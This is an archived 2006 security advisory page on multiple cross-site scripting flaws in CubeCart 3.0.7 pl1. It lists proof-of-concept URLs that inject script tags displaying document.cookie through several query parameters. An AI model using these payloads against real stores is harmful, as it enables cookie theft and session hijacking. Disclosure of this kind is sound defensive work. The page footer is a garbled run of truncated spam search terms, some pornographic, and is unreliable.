exploits , vulnerabilities , articles , CubeCart Multiple Cross-Site Scripting Vulnerabilities
| Title |
CubeCart Multiple Cross-Site Scripting Vulnerabilities |
| Published |
2006-01-16-12:00AM |
| Updated |
2006-01-16-12:00AM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
lostmon is credited with the discovery of this vulnerability. |
| Vulnerable |
CubeCart CubeCart 3.0.7 pl1 |
| Not Vulnerable |
|
| Code |
No exploit is required.
The following proof of concept URI are available: http://www.example.com/cc3/cart.php?act=reg&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZXdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.comcc3/index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go http://www.example.comcc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/cc3/index.php?act=viewProd&productId=1"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewDoc&docId=3"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewProd"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewCat&catId=1"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewCat&catId=saleItems"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%E&act=viewCat http://www.example.com/cc3/index.php?act=viewDoc&docId=1"><script>alert(document.cookie)</script>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 18 Dec 2009 05:26:47 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.1000bj all cartoo www.trish Halle Berr Www.700.xx martin lut www.fuckin free poorn reviewledt www.1000oa neiyi.wytb lesb Www.Punjab shopadmin. guest book ArticleBea www.09190. pelay boy music+hind mastergate . . usbbot Photo%2Bbu maxcpm.inf musicmazza /search/ex Giarl sex news for C phpbb-2.0. Www hot se usbbot WWW.ZZLZY. www.sex.36 Vedio arab t995t usbbot www.free s guy men news for c bhumikasex www.520dud man60 year Schoolgirl plackporn lo424l www./world www.ushow. plugins/pl httpd 1.3. Crack Data
|